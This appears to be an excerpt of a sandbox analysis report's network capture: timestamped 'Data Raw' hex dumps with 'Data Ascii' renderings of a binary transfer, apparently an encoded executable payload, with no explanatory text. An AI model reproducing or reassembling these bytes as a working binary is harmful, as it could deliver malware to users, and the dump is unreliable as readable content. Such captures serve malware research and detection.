                                Data Ascii: ^.{d(d0d !^X%P/d %% ^X!%%%%%%%f01WkP-^%%%^ESf09Wkf`%%%P-^%%%\%%%+ff09Wkf`h%%%\%%%+f(!d9f0!d1geP-N )f mf0!)g%%"P-Ngf09WkUP-NE9f09
                                2022-06-26 07:43:09 UTC354INData Raw: 7c c1 e5 1c 25 75 0d 68 da da da 7f 36 9e 66 e5 dd 31 25 25 25 60 e5 99 fa 0d 87 da da da 7e c1 e5 1c 25 0d bd da da da 7c c1 e5 1c 25 75 0d 38 da da da 7e 99 0b 1c 25 9e 68 65 25 2c dd 31 25 25 25 60 e5 99 4b 5e 18 c1 e5 1c 25 da 99 f8 7c c1 e5 1c 25 75 0d 5b da da da 64 29 49 5e 61 49 25 99 e4 66 29 49 75 0d 31 da da da 7f 9e 66 e5 dd 31 25 25 25 60 e5 99 f4 0d e3 da da da 5e 18 c1 e5 1c 25 da 99 e6 7c c1 e5 1c 25 75 0d 1b 23 da da 9e b5 af e8 89 0b 1c 25 7c c1 e5 1c 25 a9 a4 50 4b 89 66 f0 51 25 25 25 66 29 a7 9e 0d e8 da da da 7c c1 e5 1c 25 75 0d f7 23 da da 60 e5 99 dc 9e 7c 99 0b 1c 25 9e 75 0d 9c 23 da da 60 e5 99 b6 9e dd c5 e5 1c 25 0d 9b d2 da da 9e b5 df c5 e5 1c 25 5e 58 31 dc 50 4f 75 77 eb e0 89 0b 1c 25 dc 66 28 2d 64 e8 8d 0b 1c 25 64 6f
                                Data Ascii: |%uh6f1%%%`~%|%u8~%he%,1%%%`K^%|%u[d)I^aI%f)Iu1f1%%%`^%|%u#%|%PKfQ%%%f)|%u#`|%u#`%%^X1POuw%f(-d%do
                                2022-06-26 07:43:09 UTC356INData Raw: 1d 64 20 21 66 28 1d 1c 66 20 21 66 f0 25 35 65 25 0d 88 09 da da 66 20 19 0d ac b8 da da 0e e5 30 8d 9f 42 65 25 89 da 55 89 64 45 eb 20 ce 25 66 50 1d 6b 73 60 1b a1 55 6b 0e da 66 38 21 66 20 19 0d dd b8 da da 75 66 de 0d d5 b8 da da 75 0d 67 23 da da 60 e5 50 e4 66 20 2d 64 5d eb 20 ce dc 22 5e 9e 29 73 50 fb 0e e5 7f 34 34 89 64 35 8d 5c 42 65 25 68 20 19 0d 9c fd da da 66 20 21 66 28 1d 1c 66 f0 25 35 65 25 0d ce 07 da da 9e c4 e0 f7 da da c6 03 af 20 ce 66 58 09 66 50 0d 66 38 11 66 c0 38 e7 29 25 b5 0e f7 84 25 25 25 29 99 2b 5c ef 25 27 25 25 84 25 25 25 45 99 08 84 25 25 25 65 99 ec 84 25 25 25 a5 99 e0 5e ef 65 c6 1c 5e ef 45 c6 61 84 25 25 25 a5 99 2d 5c ef a5 25 25 25 c6 08 5e ef 35 66 e7 9e 84 25 25 25 65 99 ec 84 25 25 25 a5 99 e0 5e ef 29
                                Data Ascii: d !f(f !f%5e%f 0Be%UdE %fPks`Ukf8!f ufug#`Pf -d] "^)sP44d5\Be%h f !f(f%5e% fXfPf8f8)%%%%)+\%'%%%%%E%%%e%%%^e^Ea%%%-\%%%^5f%%%e%%%^)
                                2022-06-26 07:43:09 UTC357INData Raw: 35 8d 83 91 65 25 68 20 19 66 f0 41 8b 65 25 0d ef b8 da da 9e c4 4d a8 da da c6 0f 66 20 05 3a 83 36 66 c0 38 9e 30 66 11 0e e5 30 8d 68 91 65 25 89 da 55 89 64 45 da e0 a5 0b 1c 25 0e e5 7f 34 34 89 64 35 8d b9 91 65 25 9e c4 17 f1 da da c6 1d 38 9e 66 e5 5e 08 a5 0b 1c 25 dc 9e 8d 0b 1c 25 15 da 25 25 8d 0b 1c 25 cc da 25 25 8d 0b 1c 25 17 da 25 25 8d 0b 1c 25 ce da 25 25 8d 0b 1c 25 19 da 25 25 8d 0b 1c 25 d0 da 25 25 8d 0b 1c 25 1b da 25 25 8d 0b 1c 25 d2 da 25 25 8d 0b 1c 25 1d da 25 25 8d 0b 1c 25 d4 da 25 25 8d 0b 1c 25 1f da 25 25 8d 0b 1c 25 d6 da 25 25 8d 0b 1c 25 21 da 25 25 8d 0b 1c 25 d8 da 25 25 8d 0b 1c 25 23 da 25 25 8d 0b 1c 25 da da 25 25 8d 0b 1c 25 05 da 25 25 8d 0b 1c 25 bc da 25 25 8d 0b 1c 25 07 da 25 25 8d 0b 1c 25 be da 25 25 8d
                                Data Ascii: 5e%h fAe%Mf :6f80f0he%UdE%44d5e%8f^%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%!%%%%%%#%%%%%%%%%%%%%%%%%
                                2022-06-26 07:43:09 UTC358INData Raw: 25 25 25 25 25 f1 4c 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 37 20 20 9d 99 40 97 93 3c 91 20 9d 3e 40 95 99 44 4a 93 b5 51 97 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 51 97 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e4 20 24 93 99 20 97 97 4a 97 66 e5 a9 97 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 a9 97 65 25 35 25 25 25 05 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 2f 20 69 44 9b 67 54 7f 40 97 4a b5 01 97 65 25 25 25 25 25 25 25
                                Data Ascii: %%%%%Le%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye%7 @< >@DJQe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Qe%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye% $ Jfe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%e%5%%%Le%[e%[e%[e%[e%[e%YYe%uYe%Ye%/ iDgT@Je%%%%%%%
                                2022-06-26 07:43:09 UTC360INData Raw: d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 33 20 2e 99 3c 3e 46 2a 9b 40 97 8b 91 4a 52 b5 95 52 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 95 52 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e4 20 1e 4a 93 99 97 4a 91 1e 66 e5 ed 52 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 ed 52 65 25 31 25 25 25 d5 4a 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e8 20 7b 3c 97 44 3c 93 99 20 97 97 4a 97 66 e5 49 9d 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
                                Data Ascii: [e%[e%[e%[e%[e%YYe%uYe%Ye%3 .<>F*@JRRe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Re%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye% JJfRe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Re%1%%%Je%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D< JfIe%%%%%%%%%%%%%%%%%%%%%%%%
                                2022-06-26 07:43:09 UTC361INData Raw: 32 2e 64 eb 64 b2 e4 e5 99 de 66 65 21 e4 f7 99 de 66 77 21 64 9c 14 ac 9b 27 64 ac 14 a4 ce cb 99 4f af 83 da a5 d6 3c 97 2d a5 d6 9f 52 de a5 c6 45 af 5a da a5 da 3c 97 2d a5 da 9f 52 de a5 ca 45 5d d6 99 fd ea db 9e ea db b2 04 f5 36 3a 83 9e b5 14 f5 99 f4 e4 e5 99 f2 e4 f7 99 39 66 6d 21 16 6f 21 50 31 0d 6e da da da 60 e5 50 de d5 dc 9e 0c e5 9e b5 2e 7b 66 17 66 fd 66 eb 0d f2 eb da da 75 66 eb 0d ea ed da da 75 66 9e 0d e2 eb da da 75 66 9e 0d da a2 da da 75 8f 25 8d 25 29 25 25 0d 87 0b da da 5e 0d 27 83 36 9e 2e 7b 66 17 66 fd 66 eb 0d ba a0 da da 75 66 eb 0d b2 a2 da da 75 66 9e 0d aa a0 da da 75 66 9e 0d a2 a2 da da 75 8f dc 8d 25 29 25 25 0d 4f 0b da da 5e 0d 27 83 36 9e 2e 7b 66 17 66 fd 66 fb 66 9e 0d 94 da da da 60 e5 ea b9 e5 83 36 9e b5
                                Data Ascii: 2.ddfe!fw!d'dO<-REZ<-RE]6:9fm!o!P1n`P.{fffufufufu%%)%%^'6.{fffufufufu%)%%O^'6.{ffff`6
                                2022-06-26 07:43:09 UTC362INData Raw: 9c 1c 25 75 66 29 90 6d 9c 1c 25 75 66 a2 0d 0a 9e da da 75 0d 94 bc da da 3a 83 36 9e b5 2e 66 fd 8f 25 8d a5 25 25 25 8f 27 8f 25 8f 25 8d 25 25 25 e5 66 9e 0d 2d 9e da da 75 0d b7 bc da da 36 9e 0d b2 da da da 9e 66 e5 2e 7b 32 2c 66 d4 66 17 66 fd 8f 25 68 69 49 29 75 32 7b 2e 0d a2 07 da da 60 e5 50 e2 a2 29 49 da da da da 66 29 49 7f 3a 83 36 9e 2e 7b 32 2c 66 d4 66 17 66 fd 8f 25 68 69 49 29 75 32 7b 2e 0d fe be da da 60 e5 50 e2 a2 29 49 da da da da 66 29 49 7f 3a 83 36 9e 30 66 11 5e e9 1d 2e 7b 66 17 66 fd 66 20 2d 64 20 1d 66 20 31 64 20 21 7b 68 20 21 75 66 20 1d 75 2e 0d 74 07 da da 64 20 1d 66 20 1d 66 30 21 83 36 34 34 38 e7 2d 25 75 0d ef 05 da da 9e b5 30 66 11 5c e9 d9 23 da da 2e 66 fd 68 60 d9 23 da da 75 66 9e 0d 6b e7 da da 75 0d 4d
                                Data Ascii: %uf)m%ufu:6.f%%%%'%%%%%f-u6f.{2,fff%hiI)u2{.`P)If)I:6.{2,fff%hiI)u2{.`P)If)I:60f^.{fff -d f 1d !{h !uf u.td f f0!6448-%u0f\#.fh`#ufkuM
                                2022-06-26 07:43:09 UTC364INData Raw: 0c e5 64 20 21 de 28 35 64 58 1d 0c e5 64 20 19 64 20 15 64 20 11 e4 f7 99 e8 14 f3 99 e4 d1 61 00 99 33 cf 6f 50 ce 64 1d 06 20 1d c4 fe de 25 25 14 f3 99 17 d1 61 00 99 c4 68 83 23 64 38 0d ad 20 c2 61 08 50 e0 14 f3 99 01 d1 0d a3 25 25 25 61 5f 50 2f 64 38 19 14 f3 99 a6 d1 c6 bc 64 38 05 96 da da da da 61 53 50 2f 14 f3 99 dd d1 0d 7f 25 25 25 64 38 01 64 50 fd 2c 77 0d 70 25 25 25 7f 66 38 05 04 a6 4e 27 0c b6 a5 58 c2 08 50 2f 04 ef 4e 29 dc ac 0c f7 ce c9 62 b4 04 ef 4e 29 dc ac 0c f7 d5 45 ce cf 62 b4 04 ef 4e 29 dc ac 0c f7 ce c9 5e 58 15 25 99 2f 77 68 20 15 0d 41 da da da 7f 34 66 50 fd c4 22 da da da 0c b6 61 4f 99 47 61 55 97 18 61 14 52 14 44 b6 2f 25 25 25 51 55 ea db e5 dc 9e 14 f3 99 de d1 c6 09 7d c4 55 da da da 66 20 19 16 20 2d 5a 37
                                Data Ascii: d !(5dXd d d a3oPd %%ah#d8 aP%%%a_P/d8d8aSP/%%%d8dP,wp%%%f8N'XP/N)bN)EbN)^X%/wh A4fP"aOGaUaRD/%%%QU}Uf -Z7
                                2022-06-26 07:43:09 UTC365INData Raw: 25 ad 20 17 a2 20 11 25 25 25 25 dd ee 25 25 25 a5 d4 25 50 f2 66 20 31 5e 1d 27 58 e0 dd 27 25 25 25 5e 1d 37 a3 e0 dd 37 25 25 25 64 20 31 75 dd ea 02 25 25 a5 58 35 27 97 de 66 20 2d 75 68 20 f9 0d 38 27 25 25 66 58 21 ea 92 20 f9 08 da 5a 25 25 5e 1d 27 4e 3f 64 9c 0d 95 25 25 25 68 d9 24 e5 b1 65 25 de 50 11 94 de 25 25 25 ce c9 c6 08 68 50 b2 ea db 38 35 a5 d6 dc 99 35 a5 d6 29 52 e4 ea 9a 20 f9 16 20 31 a3 27 8e 25 68 41 78 d1 b1 65 25 de 38 11 66 f6 de 38 11 da ae 64 1d 06 20 21 36 83 3a c4 cc dc 25 25 b4 b1 65 25 10 68 65 25 91 68 65 25 91 68 65 25 fb 68 65 25 24 73 6b 73 1c 73 d1 2d e5 50 de d5 55 73 9e a5 58 fb 25 99 de d5 08 cf 9e 0d cc da da da ea 9a 28 f9 0c f7 16 28 31 5a f8 5e d4 d8 a1 3d e4 a4 5a 3f d5 55 cf a5 63 25 99 5f af 20 d6 cf d2
                                Data Ascii: % %%%%%%%%Pf 1^'X'%%%^77%%%d 1u%%X5'f -uh 8'%%fX! Z%%^'N?d%%%h$e%P%%%hP855)R 1'%hAxe%8f8d !6:%%e%he%he%he%he%$skss-PUsX%((1Z^=Z?Uc%_
                                2022-06-26 07:43:09 UTC366INData Raw: da 36 a5 da 08 50 27 b4 05 a5 d6 25 99 29 ba 1a c6 27 b6 1a 76 ba 05 8b 84 e4 25 50 2b d5 dc c6 29 b8 fd 0c e5 76 b6 07 b4 48 1d 76 c6 7b d1 2d e5 99 29 61 45 99 d2 73 9e 0c e5 0c f7 d1 51 5f 29 2f 4e ea ff e8 a1 9c 1c 25 64 20 19 ff 20 19 67 c6 0f 73 9e 0c e5 0c f7 af 33 a5 d4 06 99 e0 a5 d4 08 50 dc 6b af 2b 51 5f 29 2f 4e 33 6b 46 f7 2f dc e7 5c 1f 19 dc 25 25 97 0f a5 d4 08 50 27 d2 ff 9e 36 83 3a 66 c0 38 9e 30 66 11 5e e9 e5 2e 66 fd 8f 25 8f ea 8f 25 68 30 2d 68 20 e5 0e a4 0d f5 d4 da da 66 ed 68 30 e5 66 9e 0d 31 8a da da 36 66 c0 38 e7 31 25 b5 30 66 11 5e e9 e5 2e 66 fd 8f 25 8f 25 8f 25 68 30 2d 68 20 e5 8c dc 0d c5 d4 da da 66 ed 68 30 e5 66 9e 0d 01 d3 da da 36 66 c0 38 e7 2d 25 b5 2e 7b 66 17 66 fd 66 9e 0d 72 d7 da da 66 fb 0e a4 0d 9b 23
                                Data Ascii: 6P'%)'v%P+)vHv{-)aEsQ_)/N%d gs3Pk+Q_)/N3kF/\%%P'6:f80f^.f%%h0-h fh0f16f81%0f^.f%%%h0-h fh0f6f8-%.{fffrf#
                                2022-06-26 07:43:09 UTC368INData Raw: 66 ff 60 b6 99 3f 66 30 2d 66 b7 21 23 da da 66 28 2d 68 b9 ec 25 da da da 66 a6 0d fb b9 da da 66 20 2d dc bd 21 23 da da 36 38 9e 66 e5 30 66 11 2e 66 fd 66 20 2d 75 66 9e 0d d2 86 da da 66 f5 66 9e 0d c7 da da da 34 36 38 9e 66 e5 30 66 11 5e e9 05 2e 7b 66 17 66 fd 66 20 2d 75 8f 29 64 50 05 eb 20 09 25 64 38 0d eb 20 11 25 68 20 05 75 8f dc 94 b1 9c 1c 25 68 20 15 df 35 25 25 25 0d d9 ca da da 66 f5 68 20 15 0d 7f da da da 34 83 36 66 c0 38 9e 68 65 25 30 66 11 2c 66 20 2d 5e e5 21 66 35 64 30 21 c6 27 da 25 66 35 af 37 66 28 2d 5f 2c d6 99 17 66 25 06 20 21 65 66 30 2d 64 67 19 34 38 9e 66 e5 30 66 11 66 20 2d a5 9d c8 25 50 4f 66 20 2d 66 65 2d da 95 31 da 95 2d 66 20 2d 68 6d 13 66 20 2d 68 75 15 66 20 2d 5e e5 17 0d 70 23 da da 66 20 2d eb 65 c8
                                Data Ascii: f`?f0-f!#f(-h%ff -!#68f0f.ff -ufff468f0f^.{fff -u)dP %d8 %h u%h 5%%%fh 46f8he%0f,f -^!f5d0!'%f57f(-_,f% !ef0-dg48f0ff -%POf -fe-1-f -hmf -huf -^p#f -e
                                2022-06-26 07:43:09 UTC369INData Raw: 25 0d ca 1f da da 34 c4 ed e0 25 25 30 0d 0a d6 da da 34 30 0d 7d d6 da da 34 66 20 2d 75 30 68 30 fd 66 20 19 0d 9a d6 da da 34 66 20 fd 0d c7 1f da da 34 c4 76 e0 25 25 30 0d 27 d6 da da 34 30 0d 06 d6 da da 34 66 20 2d 75 30 68 30 f9 66 20 19 0d 23 21 da da 34 66 20 f9 0d 50 1f da da 34 c4 93 e0 25 25 30 0d b0 1f da da 34 30 0d 23 1f da da 34 66 20 19 6d 5e 0d 27 97 29 99 3d c6 55 66 20 2d 75 ea 92 20 15 66 30 19 0d 89 1f da da 34 c4 18 e0 25 25 66 20 2d 75 ea 92 20 15 66 29 60 d1 0b 1c 25 0d 4f 1f da da 34 c4 fe e0 25 25 66 20 2d 75 ea 92 20 15 66 29 60 01 0b 1c 25 0d 35 1f da da 34 c4 e4 e0 25 25 30 0d 95 1f da da 34 66 20 19 6d 5e 0d 27 97 2f 99 00 6d 99 24 6d 99 48 c6 5a 30 0d ab 1f da da 34 66 20 2d 75 ea 92 20 13 66 30 19 0d d4 d4 da da 34 c4 f7
                                Data Ascii: %4%%040}4f -u0h0f 4f 4v%%0'404f -u0h0f #!4f P4%%040#4f m^')=Uf -u f04%%f -u f)`%O4%%f -u f)`%54%%04f m^'/m$mHZ04f -u f04
                                2022-06-26 07:43:09 UTC370INData Raw: 66 20 2d 75 dd c1 0b 1c 25 df dc 25 25 25 0d 00 d0 da da 34 c6 40 66 2b 64 20 01 c6 fa 66 2b af 25 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e e6 66 2b 0d 6b f8 25 25 64 2b c6 27 da 2b 66 2b a5 5d 25 99 e4 66 2b af 25 5f 20 d6 50 ac 66 20 2d 75 66 3b 06 30 01 66 20 01 0d b6 19 da da 34 66 2b a5 5d 25 99 3b da 2b c6 37 66 20 2d 75 68 20 d6 df dc 25 25 25 0d e3 19 da da 34 66 2b a5 5d 25 ea 60 ff 1d da da 66 20 2d da ad 1d 23 da da 0e e5 7f 34 34 89 64 35 8d f0 c7 65 25 68 20 f9 df 27 25 25 25 0d 1a c3 da da 9e c4 4c 72 da da c6 c6 3a 83 36 66 c0 38 9e 1c 28 0a 75 28 25 25 25 1c 0a 75 25 1c 28 75 28 25 25 25 25 1c 1c 1c 1c 25 25 25 25 1c 1c 1c 25 45 25 25 25 30 66 11 5c e9 1d 23 da da 2e 7b 66 ff 66 15 0e e5 64 60 21 23 da da 0e e5 64 60 1d 23 da da 60 b6 99 e6
                                Data Ascii: f -u%%%%4@f+d f+%%%%~=%Nf+k%%d+'+f+]%f+%_ Pf -uf;0f 4f+]%;+7f -uh %%%4f+]%`f -#44d5e%h '%%%Lr:6f8(u(%%%u%(u(%%%%%%%%%E%%%0f\#.{ffd`!#d`#`
                                2022-06-26 07:43:09 UTC372INData Raw: 13 8b 66 20 17 8b 64 20 11 c6 5b 8b 66 58 15 af 20 c4 ad 20 0d 8b 66 20 17 8b 64 20 13 8b 66 20 19 8b 64 20 11 c6 3f 8b 66 58 19 af 20 c6 ad 20 0d 8b 66 20 17 8b 64 20 13 8b 66 20 15 8b 64 20 11 5e 58 21 25 a3 33 30 ea 92 a2 0d e2 23 da da 34 66 1d c6 95 a5 58 0d 27 52 8f 0d 46 ca da da ea 92 ed ea 92 e0 09 e5 1c 25 06 ed 66 9c 2c 94 89 25 25 25 74 d2 d4 34 8b 46 e5 89 8b de 1d 8b 5e 18 09 e5 1c 25 25 9b 61 ea 92 a2 16 ed a3 10 8b 5e a2 89 c6 0a 0d 55 ca da da 66 1d a5 58 1b dc 50 37 8b 66 20 19 8b 64 20 11 8b 66 20 17 8b 64 20 13 c6 35 8b 66 20 19 8b 64 20 13 8b 66 20 17 8b 64 20 11 66 ae af e8 6c 0b 1c 25 66 eb 0d 3e 21 da da 66 ae 66 eb 0d 3b d6 da da a5 18 79 c2 1c 25 25 ea a9 8e 25 25 25 66 f0 b9 0b 1c 25 dd d5 cd 65 25 0d f4 c3 da da 60 e5 ea a9 76
                                Data Ascii: f d [fX f d f d ?fX f d f d ^X!%30#4fX'RF%f,%%%t4F^%%a^UfXP7f d f d 5f d f d fl%f>!ff;y%%%%%f%e%`v
                                2022-06-26 07:43:09 UTC373INData Raw: da da 66 9e 0d d4 b9 da da c6 e4 66 9e 66 fb 0d 77 b9 da da 83 36 66 c0 38 e7 29 25 66 e5 2e 7b 32 2c 66 b4 66 17 66 1d 8f 27 68 69 49 29 75 7b 32 0d 29 dd da da 60 e5 a3 e0 af 29 49 c6 27 66 9e 7f 3a 83 36 9e 30 66 11 2c 2e 7b 32 64 28 21 66 1f 66 15 66 38 2d 2e 66 20 35 66 65 21 0e a4 66 fb 0d 46 da da da 5e 16 25 50 e8 66 20 21 66 29 dd 66 ae 0d 58 d7 da da 3a 83 36 34 38 e7 2d 25 b5 30 66 11 0e a4 2c 2c 2c 2c 2c 2c 2e 7b 32 0e e5 30 8d 86 88 65 25 89 da 55 89 64 45 0d a2 92 da da 64 20 21 96 dc 25 25 25 e3 d5 0b 1c 25 9a 05 0b 1c 25 30 8f e6 68 20 19 75 94 b5 9c 1c 25 66 ae 6f 68 1e 69 6d 0d 54 da da da 34 66 30 19 66 eb 0d b3 6e da da 30 8f e6 68 20 15 75 94 e5 9c 1c 25 66 ae 6f 68 1e 5d 6d 0d 7b da da da 34 66 30 15 66 a2 0d 46 6e da da 1e 5e a2 29
                                Data Ascii: fffw6f8)%f.{2,fff'hiI)u{2)`)I'f:60f,.{2d(!fff8-.f 5fe!fF^%Pf !f)fX:648-%0f,,,,,,.{20e%UdEd !%%%%%0h u%fohimT4f0fn0h u%foh]m{4f0fFn^)
                                2022-06-26 07:43:09 UTC374INData Raw: 7b 0d a6 8e da da 5c 98 01 21 da da 25 35 25 25 50 41 8d e0 dc 25 25 68 60 0f d8 da da 75 66 60 f5 21 da da 75 0d 9a d7 da da 60 e5 50 fe 8d e0 dc 25 25 68 60 0f d8 da da 75 7c 8d 0b 1c 25 75 0d c9 d7 da da 66 eb 0d 68 da da da 64 20 19 c6 e4 06 90 f5 21 da da 64 50 19 68 60 0f d8 da da d7 81 0d b7 33 25 25 66 f5 67 68 60 ca 23 da da 94 29 dc 25 25 0d 22 ae da da dd 09 d7 65 25 64 20 21 dd 09 d7 65 25 64 20 1d 66 9e 66 f0 d5 4a 65 25 0d 53 a9 da da a9 e5 99 04 66 1e 29 0d fb b7 da da 64 20 21 66 20 21 0d c6 f7 da da 60 e5 99 37 66 30 21 a5 a1 27 da 53 99 2d dd 0d d7 65 25 64 20 1d 8d 25 dc 25 25 68 60 0f 21 da da 75 7c 5d f5 1c 25 66 65 29 75 7c 8d 0b 1c 25 0d d3 7c da da 75 0d 75 8e da da 68 70 c9 d6 da da 66 de 0d 8a 5c da da 68 60 c9 d6 da da 64 60 c9
                                Data Ascii: {\!%5%%PA%%h`uf`!u`P%%h`u|%ufhd !dPh`3%%fgh`#)%%"e%d !e%d ffJe%Sf)d !f !`7f0!'S-e%d %%%h`!u|]%fe)u|%|uuhpf\h`d`
                                2022-06-26 07:43:09 UTC376INData Raw: da da 66 20 21 64 20 09 eb 20 0d e6 64 50 11 eb 20 15 e6 64 58 19 eb 20 1d 25 68 20 09 75 8f 27 68 30 05 7c 0d aa 1c 25 0d f2 cd da da 66 28 05 d7 dc 7c fd 52 65 25 0d 11 21 da da 66 fd 0e e5 7f 34 34 89 64 35 8d 06 92 65 25 68 20 05 0d e8 64 da da 68 20 21 0d e0 64 da da 9e c4 36 a7 da da c6 0d 66 9e 3a 83 36 66 c0 38 9e 64 f1 64 39 49 66 48 25 c4 56 a7 da da 9e 66 e5 30 66 11 0d 61 da da da 68 28 2d 5e 9c 29 66 30 2d 0d ff da da da 38 e7 29 25 66 e5 66 e8 e1 f3 1c 25 d7 dc 7c 5d 9d 65 25 0d 23 21 da da 0d 20 a7 da da 9e 66 25 18 b7 25 25 e5 5a 51 99 34 18 b3 25 25 e5 5a f0 99 2e 08 e0 25 25 e5 99 30 08 62 25 25 25 99 61 6d 99 6d c6 30 e0 4c da da 1a 5e 0d 27 97 0e 99 12 c6 22 18 bb 25 25 e5 5a ec 99 10 08 6e 25 25 e5 99 4d 6d 99 ee 6d 99 3b c6 0a 08 d8
                                Data Ascii: f !d dP dX %h u'h0|%f(|Re%!f44d5e%h dh !d6f:6f8dd9IfH%Vf0fah(-^)f0-8)%ff%|]e%#! f%%%ZQ4%%Z.%%0b%%%amm0L^'"%%Zn%%Mmm;
                                2022-06-26 07:43:09 UTC377INData Raw: 94 a5 25 25 25 0d 48 ab da da 5c e9 b9 25 25 25 9e 66 e5 7b 32 66 1f 0e f7 60 e5 99 8b a5 61 5d 25 99 85 60 da 50 39 af 25 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e 71 d7 dc c6 6d 66 d2 73 c6 dc 73 60 1b a1 37 af 31 55 5c bc da 25 25 25 ea 7e e8 3d 9c 1c 25 97 c4 66 aa 06 f3 5c bc dc 25 25 a5 54 e0 24 5e a4 23 1c 60 a4 50 29 d7 27 c6 ee af 29 5d 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e 27 d7 dc 66 e7 3a 83 9e 68 65 25 2e 7b 66 17 66 fd 0e e5 a5 18 79 c2 1c 25 25 99 ea 66 9e 0d 49 ad da da 66 fb 6f 0d 8d da da da 83 36 9e b5 0e a4 a5 18 79 c2 1c 25 25 99 e2 0d 79 da da da 66 ed 66 9c 9e 68 65 25 2e 7b 66 17 66 fd 66 9e 0d ce 60 da da 16 15 a3 e4 66 9e 0d 0d 60 da da 66 15 66 fb 66 9e 0d e0 25 25 25 83 36 9e 66 e5 2e 7b 32 30 66 1f 66 15 0e c8 60 da a3 6b 66 eb
                                Data Ascii: %%%H\%%%f{2f`a]%`P9%%%%~=%Nqmfss`71U\%%%~=%f\%%T$^#`P)')]%%%~=%N'f:he%.{ffy%%fIfo6y%%yffhe%.{fff`f`fff%%%6f.{20ff`kf
                                2022-06-26 07:43:09 UTC378INData Raw: 7c 6d c2 1c 25 0d 99 da da da 75 0d 9b c7 da da 0e 1b c6 04 af 69 12 2b af 81 12 e2 4f fd 97 3f 1e ad 20 da af 20 da 00 da 25 25 25 ea 86 e0 3d 9c 1c 25 23 20 da 23 a6 50 0f 5e eb 27 5e 23 31 58 2f af 69 12 2b 2f 69 12 e2 50 ed 3a 83 36 34 38 9e 7c 71 c2 1c 25 5e 1d fa 52 e2 ea 7e e0 35 9e 1c 25 ea b7 e5 9e 68 65 25 30 66 11 5c e9 89 23 da da 2e 7b 32 a2 e0 6d c2 1c 25 e4 29 25 25 a2 e0 71 c2 1c 25 e4 25 25 25 a2 e0 75 c2 1c 25 dc 25 25 25 0d 48 c7 da da 60 e5 99 e0 7e 6d c2 1c 25 8b 60 e5 99 f6 66 f5 8b 5c 07 da de ea 92 f7 64 f0 71 c2 1c 25 ea 92 e5 9c 0d 2f 7e 75 c2 1c 25 e3 61 9e 65 25 9a 3d 9c 1c 25 94 2d 25 25 25 ce 80 5e 18 f5 e5 1c 25 27 ea 60 88 25 25 25 0d 48 da da da a9 e5 99 ee eb e0 30 c2 1c 25 25 eb e0 79 c2 1c 25 25 c4 9a 25 25 25 30 0d 15
                                Data Ascii: |m%ui+O? %%%=%# #P^'^#1X/i+/iP:648|q%^R~5%he%0f\#.{2m%)%%q%%%%u%%%%H`~m%`f\dq%/~u%ae%=%-%%%^%'`%%%H0%%y%%%%%0
                                2022-06-26 07:43:09 UTC380INData Raw: 25 da 00 59 ce 1c 25 66 e5 30 66 11 5e e9 11 2e 0e e5 64 20 11 0e e5 30 8d 91 a2 65 25 89 da 55 89 64 45 0d 20 78 da da 66 fd 60 b6 99 12 64 38 15 eb 20 19 25 68 30 11 66 9e 0d af 09 da da 66 20 11 64 20 1d eb 20 21 e6 68 20 15 75 8f dc 66 e8 cd aa 1c 25 d7 dc 7c 15 9d 65 25 0d 9d c8 da da 66 f5 c6 39 66 e8 45 f5 1c 25 d7 dc 7c 15 9d 65 25 0d 4b c8 da da 66 f5 64 7f 31 66 e7 0d 8b 97 da da 0e e5 7f 34 34 89 64 35 8d 4e a2 65 25 68 20 11 0d 98 9d da da 9e c4 ee 97 da da c6 15 36 66 c0 38 9e 2e 66 fd 60 b6 50 e0 0d 7d da da da 66 9e 36 9e 2e 7b 2c 96 39 9e 1c 25 66 19 c6 3b 66 de 64 2b 66 2b 66 25 64 de df 2d 25 25 25 66 2b 0d 5f 87 da da 5e 16 25 50 c0 7f 83 36 9e b5 2e 8d 11 a2 65 25 0d 7c c1 da da 66 fd 60 b6 99 35 8d 21 a2 65 25 2e 0d bd c1 da da 7e 61
                                Data Ascii: %Y%f0f^.d 0e%UdE xf`d8 %h0ff d !h uf%|e%f9fE%|e%Kfd1f44d5Ne%h 6f8.f`P}f6.{,9%f;fd+f+f%d-%%%f+_^%P6.e%|f`5!e%.~a
